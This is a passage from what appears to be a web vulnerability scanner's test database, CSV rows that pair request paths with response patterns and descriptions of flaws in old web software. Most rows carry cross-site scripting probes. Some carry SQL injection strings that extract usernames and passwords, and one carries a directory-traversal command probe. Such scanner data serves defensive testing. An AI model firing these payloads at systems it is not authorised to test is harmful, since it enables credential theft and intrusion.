injection.\",\"\",\"\"\n\"000691\",\"0\",\"9\",\"/postnuke/html/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*\",\"GET\",\"<r0x>\\(\\.\\+\\?\\)<r0x>\",\"\",\"\",\"\",\"\",\"My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.\",\"\",\"\"\n\"000692\",\"0\",\"8\",\"@CGIDIRSalibaba.pl|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\,\",\"GET\",\"boot\\.ini\",\"\",\"\",\"\",\"\",\"This CGI allows attackers to execute arbitrary commands on the server.\",\"\",\"\"\n\"000693\",\"0\",\"9\",\"/phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month=\",\"GET\",\"DB Error: syntax error\",\"\",\"\",\"\",\"\",\"phpWebSite 0.9.x and below are vulnerable to SQL injection.\",\"\",\"\"\n\"000694\",\"2875\",\"9\",\"/phpBB2/search.php?search_id=1\\\\\",\"GET\",\"SQL Error\",\"\",\"\",\"\",\"\",\"phpBB 2.06 search.php is vulnerable to SQL injection attack. Error page also includes full path to search.php file.\",\"\",\"\"\n\"000695\",\"0\",\"9\",\"/index.php?module=My_eGallery&do=showpic&pid=-1/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,concat(0x3C7230783E,pn_uname,0x3a,pn_pass,0x3C7230783E),0,0,0/**/FROM/**/md_users/**/WHERE/**/pn_uid=$id/*\",\"GET\",\"<r0x>\\(\\.\\+\\?\\)<r0x>\",\"\",\"\",\"\",\"\",\"My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection.\",\"\",\"\"\n\"000696\",\"10107\",\"9\",\"/author.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"May be FactoSystem CMS, which could include SQL injection problems that could not be tested remotely.\",\"\",\"\"\n\"000697\",\"0\",\"4\",\"/horde/test.php\",\"GET\",\"IMP: 3\\.\\(0\\|1\\|2\\|2\\\\\\.1\\)\",\"\",\"\",\"\",\"\",\"IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerable to Cross Site Scripting (XSS). See http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2.\",\"\",\"\"\n\"000698\",\"0\",\"4\",\"/imp/horde/test.php\",\"GET\",\"IMP: 3\\.\\(0\\|1\\|2\\|2\\\\\\.1\\)\",\"\",\"\",\"\",\"\",\"IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerable to Cross Site Scripting (XSS). See http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2.\",\"\",\"\"\n\"000699\",\"0\",\"4\",\"@CGIDIRShorde/test.php\",\"GET\",\"IMP: 3\\.\\(0\\|1\\|2\\|2\\\\\\.1\\)\",\"\",\"\",\"\",\"\",\"IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerable to Cross Site Scripting (XSS). See http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2.\",\"\",\"\"\n\"000700\",\"0\",\"4\",\"/examples/cookie\",\"GET\",\"Cookie servlet\",\"\",\"\",\"\",\"\",\"JEUS default servlet examples are vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages. http://securitytracker.com/alerts/2003/Jun/1007004.html\",\"\",\"\"\n\"000701\",\"0\",\"4\",\"/examples/session\",\"GET\",\"Session servlet\",\"\",\"\",\"\",\"\",\"JEUS default servlet examples are vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages. http://securitytracker.com/alerts/2003/Jun/1007004.html\",\"\",\"\"\n\"000702\",\"7501\",\"4\",\"/themes/mambosimple.php?detection=detected&sitename=</title><script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000703\",\"0\",\"4\",\"/index.php?option=search&searchword=<script>alert(document.cookie);</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\);<\\/script>\",\"\",\"\",\"\",\"\",\"Mambo Site Server 4.0 build 10 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000704\",\"7505\",\"4\",\"/emailfriend/emailnews.php?id=\\\"<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000705\",\"7504\",\"4\",\"/emailfriend/emailfaq.php?id=\\\"<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000706\",\"7503\",\"4\",\"/emailfriend/emailarticle.php?id=\\\"<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000707\",\"0\",\"4\",\"/administrator/upload.php?newbanner=1&choice=\\\"<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000708\",\"7495\",\"4\",\"/administrator/popups/sectionswindow.php?type=web&link=\\\"<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000709\",\"7498\",\"4\",\"/administrator/gallery/view.php?path=\\\"<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000710\",\"7499\",\"4\",\"/administrator/gallery/uploadimage.php?directory=\\\"<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000711\",\"7497\",\"4\",\"/administrator/gallery/navigation.php?directory=\\\"<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000712\",\"7496\",\"4\",\"/administrator/gallery/gallery.php?directory=\\\"<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000713\",\"2820\",\"4\",\"/index.php?dir=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Auto Directory Index 1.2.3 and prior are vulnerable to XSS attacks.\",\"\",\"\"\n\"000714\",\"0\",\"4\",\"/https-admserv/bin/index?/<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Sun ONE Web Server 6.1 administration control is vulnerable to XSS attacks.\",\"\",\"\"\n\"000715\",\"2876\",\"4\",\"/clusterframe.jsp?cluster=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Macromedia JRun 4.x JMC Interface, clusterframe.jsp file is vulnerable to a XSS attack.\",\"\",\"\"\n\"000716\",\"0\",\"4\",\"/article.cfm?id=1'<script>alert(document.cookie);</script>\",\"GET\",\"\\[SQL SERVER\\] Error Code\",\"\",\"\",\"\",\"\",\"ColdFusion may reveal SQL information in malformed requests.\",\"\",\"\"\n\"000717\",\"0\",\"4\",\"/upload.php?type=\\\"<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Mambo PHP Portal/Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000718\",\"4619\",\"4\",\"/soinfo.php?\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"The PHP script soinfo.php is vulnerable to Cross Site Scripting. Set expose_php = Off in php.ini.\",\"\",\"\"\n\"000719\",\"0\",\"4\",\"/modules.php?op=modload&name=News&file=index&catid=&topic=><script>alert('Vulnerable');</script>;\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Postnuke is vulnerable to Cross Site Scripting. CA-2000-02.\",\"\",\"\"\n\"000720\",\"0\",\"4\",\"/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Postnuke is vulnerable to Cross Site Scripting. CA-2000-02.\",\"\",\"\"\n\"000721\",\"0\",\"4\",\"/modules.php?op=modload&name=News&file=article&sid=<script>alert('Vulnerable');</script+>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script\\+>\",\"\",\"\",\"\",\"\",\"Postnuke is vulnerable to Cross Site Scripting. CA-2000-02.\",\"\",\"\"\n\"000722\",\"0\",\"4\",\"/webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef\",\"GET\",\"<script>alert\\('Vulnerable'\\);<\\/script>\",\"\",\"\",\"\",\"\",\"Documentum Webtop (Tomcat 4.1) is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000723\",\"59015\",\"4\",\"/addyoursite.php?catid=&lt;Script&gt;JavaScript:alert('Vulnerable');&lt;/Script&gt;\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"phpLinkat is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000724\",\"0\",\"4\",\"/666%0a%0a<script>alert('Vulnerable');</script>666.jsp\",\"GET\",\"<script>alert\\('Vulnerable'\\);<\\/script>\",\"\",\"\",\"\",\"\",\"Apache Tomcat 4.1 / Linux is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000725\",\"0\",\"4\",\"/servlet/MsgPage?action=test&msg=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"NetDetector 3.0 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000726\",\"0\",\"4\",\"/servlet/org.apache.catalina.ContainerServlet/<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.\",\"\",\"\"\n\"000727\",\"0\",\"4\",\"/servlet/org.apache.catalina.Context/<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.\",\"\",\"\"\n\"000728\",\"0\",\"4\",\"/servlet/org.apache.catalina.Globals/<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.\",\"\",\"\"\n\"000729\",\"0\",\"4\",\"/servlet/org.apache.catalina.servlets.WebdavStatus/<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Apache-Tomcat is vulnerable to Cross Site Scripting (XSS) by invoking java classes. CA-2000-02.\",\"\",\"\"\n\"000730\",\"0\",\"4\",\"/servlets/MsgPage?action=badlogin&msg=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"The NetDetector install is vulnerable to Cross Site Scripting (XSS) in its invalid login message. CA-2000-02.\",\"\",\"\"\n\"000731\",\"0\",\"4\",\"/<script>alert('Vulnerable')</script>.shtm\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\\.shtml\",\"\",\"\",\"\",\"\",\"Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000732\",\"0\",\"4\",\"/<script>alert('Vulnerable')</script>.stm\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\\.shtml\",\"\",\"\",\"\",\"\",\"Server is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000733\",\"0\",\"4\",\"/admin/sh_taskframes.asp?Title=Configuraci%C3%B3n%20de%20registro%20Web&URL=MasterSettings/Web_LogSettings.asp?tab1=TabsWebServer%26tab2=TabsWebLogSettings%26__SAPageKey=5742D5874845934A134CD05F39C63240&ReturnURL=\\\"><script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"IIS 6 on Windows 2003 is vulnerable to Cross Site Scripting (XSS) in certain error messages. CA-2000-02.\",\"\",\"\"\n\"000734\",\"17665\",\"4\",\"/SiteServer/Knowledge/Default.asp?ctr=\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Site Server is vulnerable to Cross Site Scripting\",\"\",\"\"\n\"000735\",\"17666\",\"4\",\"/_mem_bin/formslogin.asp?\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Site Server is vulnerable to Cross Site Scripting\",\"\",\"\"\n\"000736\",\"0\",\"4\",\"/nosuchurl/><script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"JEUS is vulnerable to Cross Site Scripting (XSS) when requesting non-existing JSP pages. http://securitytracker.com/alerts/2003/Jun/1007004.html\",\"\",\"\"\n\"000737\",\"9216\",\"4\",\"/test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x\",\"GET\",\"<SCRIPT>alert\\('Vulnerable'\\)<\\/SCRIPT>\",\"\",\"\",\"\",\"\",\"OmniHTTPD's test.php is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000738\",\"9217\",\"4\",\"/test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x\",\"GET\",\"<SCRIPT>alert\\('Vulnerable'\\)<\\/SCRIPT>\",\"\",\"\",\"\",\"\",\"OmniHTTPD's test.shtml is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000739\",\"9218\",\"4\",\"@CGIDIRSredir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3C%2FSCRIPT%3E\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"OmniHTTPD's redir.exe is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000740\",\"0\",\"4\",\"/search/results.stm?query=&lt;script&gt;alert('vulnerable');&lt;/script&gt;\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Default Sambar file is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000741\",\"3624\",\"4\",\"/webcalendar/week.php?eventinfo=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Webcalendar 0.9.42 and below are vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000742\",\"9234\",\"4\",\"@CGIDIRSYaBB/YaBB.cgi?board=BOARD&action=display&num=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"YaBB 1 Gold SP1 and earlier are vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000743\",\"0\",\"4\",\"@CGIDIRSvq/demos/respond.pl?<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"vqServer default CGI files are vulnerable to Cross Site Scripting (XSS), remove all default CGI files. CA-2000-02.\",\"\",\"\"\n\"000744\",\"6458\",\"4\",\"@CGIDIRSviewcvs.cgi/viewcvs/viewcvs/?sortby=rev\\\"><script>alert('Vulnerable')</script>;\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  CA-2000-02.\",\"\",\"\"\n\"000745\",\"6458\",\"4\",\"@CGIDIRSviewcvs.cgi/viewcvs/?cvsroot=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"ViewCVS v0.9.2 from viewcvs.sourceforge.net and below are vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version.  CA-2000-02.\",\"\",\"\"\n\"000746\",\"8391\",\"4\",\"@CGIDIRSurlcount.cgi?%3CIMG%20SRC%3D%22%22%20ONERROR%3D%22alert%28%27Vulnerable%27%29%22%3E\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"urlcount.cgi on the Lil'HTTP server may be vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000747\",\"0\",\"4\",\"@CGIDIRStest-cgi.exe?<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Default CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000748\",\"0\",\"4\",\"@CGIDIRSstart.cgi/%3Cscript%3Ealert('Vulnerable');%3C/script%3E\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Aestiva HTML/OS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000749\",\"9230\",\"4\",\"@CGIDIRSsearch.pl?Realm=All&Match=0&Terms=test&nocpp=1&maxhits=10&;Rank=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Fluid Dynamics FD Search engine from http://www.xav.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02. Upgrade to FDSE version 2.0.0.0055\",\"\",\"\"\n\"000750\",\"2322\",\"4\",\"@CGIDIRSsearch.php?searchstring=<script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Gallery 1.3.4 and below is vulnerable to Cross Site Scripting (XSS). Upgrade to the latest version. BID-8288.\",\"\",\"\"\n\"000751\",\"8392\",\"4\",\"@CGIDIRSpbcgi.cgi?name=Joe%Camel&email=%3CSCRIPT%3Ealert%28%27Vulnerable%27%29%3B%3C%2FSCRIPT%3E\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Lil'HTTP Server (Summit Computer Networks) CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000752\",\"0\",\"4\",\"@CGIDIRSmyguestbook.cgi?action=view\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"myGuestBook 1.0 may be vulnerable to Cross Site Scripting (XSS) in posted contents. Upgrade to the latest version from http://www.levcgi.com/.  CA-2000-02.\",\"\",\"\"\n\"000753\",\"4458\",\"4\",\"@CGIDIRSlogin.pl?course_id=\\\">&lt;SCRIPT&gt;alert('Vulnerable')&lt;/SCRIPT&gt;\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"BlackBoard 5 from BlackBoard.com is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000754\",\"7590\",\"4\",\"@CGIDIRShtsearch.cgi?words=%22%3E%3Cscript%3Ealert%'Vulnerable'%29%3B%3C%2Fscript%3E\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"htdig is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000755\",\"0\",\"4\",\"@CGIDIRSFormMail.cgi?<script>alert(\\\"Vulnerable\\\");</script>\",\"GET\",\"<script>alert\\(\\\"Vulnerable\\\"\\);<\\/script>\",\"\",\"\",\"\",\"\",\"FormMail.cgi allows Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000756\",\"8661\",\"4\",\"@CGIDIRSfom/fom.cgi?cmd=<script>alert('Vulnerable')</script>&file=1&keywords=vulnerable\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Faq-O-Matic is vulnerable to Cross Site Scripting (XSS) CA-2000-02. Check for updates here http://faqomatic.sourceforge.net/fom-serve/cache/1.html\",\"\",\"\"\n\"000757\",\"54110\",\"4\",\"@CGIDIRSfom.cgi?file=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Faq-O-Matic is vulnerable to Cross Site Scripting (XSS).  Upgrade to the latest from http://sourceforge.net/projects/faqomatic. CA-2000-02.\",\"\",\"\"\n\"000758\",\"0\",\"4\",\"@CGIDIRSerba/start/%3Cscript%3Ealert('Vulnerable');%3C/script%3E\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Aestiva HTML/OS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000759\",\"21366\",\"4\",\"@CGIDIRSdiagnose.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This COWS (CGI Online Worldweb Shopping) script may give system information to attackers, and may be vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000760\",\"2748\",\"4\",\"@CGIDIRSdansguardian.pl?DENIEDURL=</a><script>alert('Vulnerable');</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\);<\\/script>\",\"\",\"\",\"\",\"\",\"CensorNet Proxy Service is vulnerable to Cross Site Scripting (XSS) in error pages. CA-2000-02.\",\"\",\"\"\n\"000761\",\"651\",\"4\",\"@CGIDIRScgicso?query=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"This CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000762\",\"5031\",\"4\",\"@CGIDIRSbetsie/parserl.pl/<script>alert('Vulnerable')</script>;\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000763\",\"21556\",\"4\",\"@CGIDIRSauction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Mewsoft Auction 3.0 from http://www.mewsoft.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000764\",\"58958\",\"4\",\"@CGIDIRSathcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Authoria HR Suite is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000765\",\"9283\",\"4\",\"@CGIDIRS.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000766\",\"9283\",\"4\",\"@CGIDIRS.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>\",\"GET\",\"img src=javascript:alert\\('Vulnerable'\\)\",\"\",\"\",\"\",\"\",\"Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000767\",\"0\",\"4\",\"/~/<script>alert('Vulnerable')</script>.aspx?aspxerrorpath=null\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02\",\"\",\"\"\n\"000768\",\"0\",\"4\",\"/~/<script>alert('Vulnerable')</script>.aspx\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Cross site scripting (XSS) is allowed with .aspx file requests (may be Microsoft .net). CA-2000-02\",\"\",\"\"\n\"000769\",\"0\",\"4\",\"/~/<script>alert('Vulnerable')</script>.asp\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Cross site scripting (XSS) is allowed with .asp file requests (may be Microsoft .net). CA-2000-02\",\"\",\"\"\n\"000770\",\"58957\",\"4\",\"/z_user_show.php?method=showuserlink&class=<Script>javascript:alert(document.cookie)</Script>&rollid=admin&x=3da59a9da8825&\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"orum 2.4 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000771\",\"0\",\"4\",\"/catinfo?<b>\\\">TESTING\",\"GET\",\"<b>\\\">TESTING\",\"\",\"\",\"\",\"\",\"The Interscan Viruswall catinfo script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000772\",\"0\",\"4\",\"/webchat/register.php?register=yes&username=OverG&email=<script>alert%20(\\\"Vulnerable\\\")</script>&email1=<script>alert%20(\\\"Vulnerable\\\")</script>\",\"GET\",\"alert\\(\\\"Vulnerable\\\"\\)<\\/script>\",\"\",\"\",\"\",\"\",\"PHP Web Chat 2.0 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000773\",\"0\",\"4\",\"/webamil/test.php\",\"GET\",\"IMP: 3\\.\\(0\\|1\\|2\\|2\\\\\\.1\\)\",\"\",\"\",\"\",\"\",\"IMP version 3.0, 3.1, 3.2, or 3.2.1 are vulnerabl to Cross Site Scripting (XSS). See http://marc.theaimsgroup.com/?l=imp&m=105940167329471&w=2.\",\"\",\"\"\n\"000774\",\"59444\",\"4\",\"/users.php?mode=profile&uid=&lt;script&gt;alert(document.cookie)&lt;/script&gt;\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"GeekLog 1.3.7 allows Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000775\",\"0\",\"4\",\"/usercp.php?function=avataroptions:javascript:alert(%27Vulnerable%27)\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"IcrediBB Bulletin Board System is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"000776\",\"0\",\"4\",\"/user.php?op=userinfo&uname=<script>alert('hi');</script>\",\"GET\",\"<script>alert\\('hi'\\);<\\/script>\",\"\",\"\",\"\",\"\",\"The PHP-Nuke installation is vulnerable to Cross Site Scripting (XSS). Update to versions above 5.3.1. CA-2000-02.\",\"\",\"\"\n\"000777\",\"0\",\"4\",\"/user.php?op=confirmnewuser&module=NS-NewUser&uname=%22%3E%3Cimg%20src=%22javascript:alert(document.cookie);%22%3E&email=test@test.com\",\"GET\",\"javascript:alert\\(document\\.cookie\\)\",\"\",\"\",\"\",\"\",\"Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). 